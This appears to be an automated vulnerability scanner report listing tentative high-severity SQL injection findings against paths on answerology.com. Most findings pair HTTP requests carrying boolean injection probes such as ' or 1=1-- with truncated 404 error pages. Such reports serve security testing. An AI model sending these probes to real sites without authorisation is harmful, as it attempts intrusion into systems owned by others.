Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/quickandsimple |
GET /cobrands/quickandsimple10784842'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:43:16 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands/quickandsimple10784842'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:43:17 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/redbookmag |
GET /cobrands/redbookmag'%20and%201%3d1--%20/RedbookmagLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:48 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/redbookmag'%20and%201%3d2--%20/RedbookmagLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/redbookmag |
GET /cobrands/redbookmag Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/redbookmag Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/seventeen |
GET /cobrands21121690'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands21121690'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/CharacterCounter |
GET /cssjs'%20and%201%3d1--%20/CharacterCounter.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:32 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cssjs'%20and%201%3d2--%20/CharacterCounter.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:33 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/CoachesLayout.js |
GET /cssjs/CoachesLayout.js18708381'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:43:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cssjs/CoachesLayout.js18708381'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:43:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/countdownTimer.js |
GET /cssjs'%20and%201%3d1--%20/countdownTimer.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
